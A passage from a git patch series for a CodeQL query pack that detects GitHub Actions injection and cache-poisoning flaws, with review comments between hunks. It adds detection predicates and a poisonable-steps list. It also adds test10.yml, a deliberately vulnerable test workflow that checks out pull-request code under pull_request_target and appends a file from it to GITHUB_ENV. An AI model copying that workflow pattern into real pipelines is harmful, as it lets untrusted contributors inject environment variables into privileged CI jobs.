.github/workflows/common-copybara.bara.sky\n | subpaths #select From 90efdc7deb85f3074f595dd4985ca7000d5820dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:47:16 +0200 Subject: [PATCH 447/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3a09bb016744..1c4415a305de 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.30 +version: 0.1.31 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b89b197da04b..9b49717942b5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.30 +version: 0.1.31 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8cf1a6afa7755cedad993fec7d9957023abda72f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 15:48:57 +0200 Subject: [PATCH 448/707] feat(bash): Add support for `cat hazelcast/.github/java-config.env >> $GITHUB_ENV` --- ql/lib/codeql/actions/Helper.qll | 26 ++++++++ .../security/EnvPathInjectionQuery.qll | 43 ++++++++----- .../actions/security/EnvVarInjectionQuery.qll | 48 ++++++++++----- .../security/OutputClobberingQuery.qll | 60 ++++++++++++------- .../CWE-077/.github/workflows/test10.yml | 28 +++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 ++ .../CWE-077/EnvVarInjectionMedium.expected | 3 + 7 files changed, 158 insertions(+), 54 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f177c645dbdc..2953817de6b8 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -212,6 +212,32 @@ predicate writeToGitHubPath(Run run, string content) { extractFileWrite(run.getScript(), "GITHUB_PATH", content) } +/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ +bindingset[script, file_var] +predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) +} + +predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) +} + +predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) +} + +predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) +} + predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index fc45b8c041d0..40c0c7da9eb9 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources 
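Review bot: The `path` value produced by `fileToFileWrite` (capture group 2, a greedy `[^>\n]+` followed by `\\s*`) keeps the trailing whitespace and, for a line such as `cat a.env b.env >> $GITHUB_ENV`, returns all operands as one string; the callers added in this commit discard it with `_`, but the first caller that relates it to a checkout or artifact path will compare against a string that never matches. Suggest `path = line.regexpCapture(regexp, 2).trim()`, and `splitAt(" ")` on top of that if every operand should count; `(cat)\\s+` instead of `\\s*` would also stop the pattern from matching when nothing separates the command from its first operand. The three wrappers `fileToGitHubEnv`, `fileToGitHubOutput` and `fileToGitHubPath` carry no QLDoc, unlike the `writeToGitHub*` predicates just above them; a one-liner each along the lines of `/** Holds if a line of the Run step's script appends the whole content of the file at path to GITHUB_ENV. */` is enough. The QLDoc on `fileToFileWrite` itself is phrased as an action ("Writes the content…") whereas the file's convention is "Holds if …", e.g. "Holds if a line of script redirects or pipes the contents of the file at path into the file named by the file_var variable".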
@@ -16,27 +17,39 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { } */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubPath(run, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_PATH + fileToGitHubPath(run, _) + or + exists(string value | + writeToGitHubPath(run, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index f7a9283f8002..4f54f38f2746 100644 
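Review bot: The new `fileToGitHubPath(run, _)` branch throws the file path away, so a whole-file `cat … >> $GITHUB_PATH` in any step that merely follows an untrusted checkout or artifact download is reported, including a file the workflow generated itself or one outside the directory that step populated; the `echo`/`$(cat …)` branches next to it are at least narrowed by `outputsPartialFileContent`. Suggest binding the path and relating it to where the preceding step writes (the `path:` input of the checkout or download step, where the step class exposes it) instead of `_`, or else a comment stating that the branch intentionally over-approximates. The same unscoped branch is added to `EnvVarInjectionFromFileReadSink` in EnvVarInjectionQuery.qll and to `OutputClobberingFromFileReadSink` in OutputClobberingQuery.qll in this commit. The QLDoc of `EnvPathInjectionFromFileReadSink` precedes this hunk, so I cannot tell whether it lists the `cat` form the way the other two sinks' docs now do; if not, it should.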
--- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources 
@@ -12,33 +13,48 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.env >> $GITHUB_ENV * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_ENV + fileToGitHubEnv(run, _) + or + exists(string content, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + // e.g. + // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. 
+ // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4fe3268c00af..af8f7af089db 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources 
@@ -12,40 +13,53 @@ abstract class OutputClobberingSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.vars >> $GITHUB_OUTPUT * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT * echo "sha=$(> $GITHUB_OUTPUT */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and - not key2 = key - ) and ( - outputsPartialFileContent(value) - or // e.g. 
- // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.vars >> $GITHUB_OUTPUT + fileToGitHubOutput(run, _) + or + exists(string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml new file mode 100644 index 000000000000..f43a12cb42a3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml 
@@ -0,0 +1,28 @@
+name: Build and Dockerize
+
+on:
+ pull_request_target:
+
+jobs:
+ build:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - name: Decide Which 'ref' To Checkout
+ id: decide-ref
+ run: |
+ if [[ "${{github.event_name}}" == "pull_request_target" ]]; then
+ echo "ref=refs/pull/${{ github.event.pull_request.number }}/merge" >> $GITHUB_OUTPUT
+ else
+ echo "ref=${{github.ref}}" >> $GITHUB_OUTPUT
+ fi
+
+ - name: Checkout
+ uses: actions/checkout@v4
+ with:
+ ref: ${{steps.decide-ref.outputs.ref}}
+ path: "foo"
+
+ - name: Read Java Config
+ run: cat foo/.github/java-config.env >> $GITHUB_ENV
+
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
index 7d92032f00b7..359275aef43d 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
@@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -58,6 +59,8 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -80,3 +83,4 @@ subpaths | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be 
controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 2cd369538027..eaa9fed4c617 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -58,5 +59,7 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select From 0990774302bc2556973584bb4c4d41043f0d7b78 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 18:53:53 +0200 Subject: [PATCH 449/707] feat(poisonable_steps): Add python -m pip install --- ql/lib/ext/config/poisonable_steps.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index e2742fd60a7c..f79ca795cd09 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml 
@@ -44,6 +44,8 @@ extensions: - ["poetry"] - ["pylint"] - ["pytest"] + - ["python\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"] - ["rake"] - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] From 397eb2a762ae15ff89237c7b8db0f8443ef9fdb1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:20 +0200 Subject: [PATCH 450/707] Add getPath() to PRHeadCheckout and CacheWriting classes Add getPath() methods to get the path where a checkout step writes the code and where a Cache write reads the files from. --- .../actions/security/CachePoisoningQuery.qll | 34 ++++++++++++++++++- .../security/UntrustedCheckoutQuery.qll | 30 +++++++++++++++- 2 files changed, 62 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 29c0ed4feed0..8c1a9ee0fd78 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -44,14 +44,28 @@ predicate runsOnDefaultBranch(Event e) { ) } -abstract class CacheWritingStep extends Step { } +abstract class CacheWritingStep extends Step { + abstract string getPath(); +} class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class SetupJavaUsesStep extends CacheWritingStep, UsesStep { 
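Review bot: The two new entries match only the literal interpreter name `python`, so `python3 -m pip install -r …` (and `py -m pip install -r …`), which are at least as common in workflow scripts, are still not treated as poisonable steps. How the list is applied is not visible here; assuming the entries are regex-matched against the run script as the `rails\\s+db:create` neighbour suggests, a single entry `- ["python3?\\s+-m\\s+pip\\s+install\\s+(-r|--requirement)"]` replaces both added lines and covers the `python3` spelling too.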
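Review bot: `getPath()` returns the literal string `"?"` whenever the path is unknown, which makes every unknown path equal to every other unknown path: a query that later relates a `CacheWritingStep` path to a checkout path will match two `"?"` results and report a finding with no evidence behind it, and `exists(step.getPath())` can no longer express "path is known". Prefer having no result in the unknown case (`override string getPath() { none() }`, or simply dropping the `else` branch) and saying on the abstract declaration that callers must cope with an empty result; if a displayable fallback is wanted, a separate predicate is the safer place for it. The abstract `getPath()` also lacks QLDoc, e.g. `/** Gets a path (one per line of the path input) that this step stores in the cache, if it can be determined. */`. The same sentinel is used by the seven `Setup*UsesStep` overrides in the following hunks of this file and by the checkout overrides and `getStepCWD()` in UntrustedCheckoutQuery.qll. `CacheActionUsesStep` and `CacheActionSaveUsesStep` carry byte-identical overrides; an intermediate class or a shared helper predicate would avoid the duplication.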
@@ -62,6 +76,9 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupGoUsesStep extends CacheWritingStep, UsesStep { @@ -73,6 +90,9 @@ class SetupGoUsesStep extends CacheWritingStep, UsesStep { this.getArgument("cache") = "true" ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupNodeUsesStep extends CacheWritingStep, UsesStep { @@ -83,6 +103,9 @@ class SetupNodeUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupPythonUsesStep extends CacheWritingStep, UsesStep { @@ -93,6 +116,9 @@ class SetupPythonUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { @@ -103,6 +129,9 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -110,4 +139,7 @@ class 